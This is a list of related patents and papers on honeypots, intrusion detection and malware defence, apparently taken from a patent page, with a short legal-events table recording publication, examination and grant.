| US11757844B2 (en) | Smart proxy for a large scale high-interaction honeypot farm | |
| US11757936B2 (en) | Large scale high-interactive honeypot farm | |
| CN111556061B (en) | Network disguising method, device, equipment and computer readable storage medium | |
| US9356950B2 (en) | Evaluating URLS for malicious content | |
| CA2689126C (en) | System and method for analyzing unauthorized intrusion into a computer network | |
| US8910285B2 (en) | Methods and systems for reciprocal generation of watch-lists and malware signatures | |
| US20150326587A1 (en) | Distributed system for bot detection | |
| US20150326588A1 (en) | System and method for directing malicous activity to a monitoring system | |
| CN111651757A (en) | Attack behavior monitoring method, device, equipment and storage medium | |
| CN113676449B (en) | Network attack processing method and device | |
| CN111526132B (en) | Attack transfer method, device, equipment and computer readable storage medium | |
| WO2016081561A1 (en) | System and method for directing malicious activity to a monitoring system | |
| CN110348210B (en) | Safety protection method and device | |
| CN111541701B (en) | Attack trapping method, device, equipment and computer readable storage medium | |
| JP6592196B2 (en) | Malignant event detection apparatus, malignant event detection method, and malignant event detection program | |
| Kim et al. | Agent-based honeynet framework for protecting servers in campus networks | |
| CN112583841B (en) | Virtual machine safety protection method and system, electronic equipment and storage medium | |
| CN116760607A (en) | Method and device for establishing honeypot trapping node, medium and equipment | |
| CN107517226B (en) | Alarm method and device based on wireless network intrusion | |
| Sui et al. | A behavior analysis based mobile malware defense system | |
| CN114285588A (en) | Method, device, equipment and storage medium for acquiring attack object information | |
| Felix et al. | Framework for Analyzing Intruder Behavior of IoT Cyber Attacks Based on Network Forensics by Deploying Honeypot Technology | |
| CN113794674B (en) | Method, device and system for detecting mail | |
| CN115225297B (en) | Method and device for blocking network intrusion | |
| US20220337488A1 (en) | Network device type classification |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |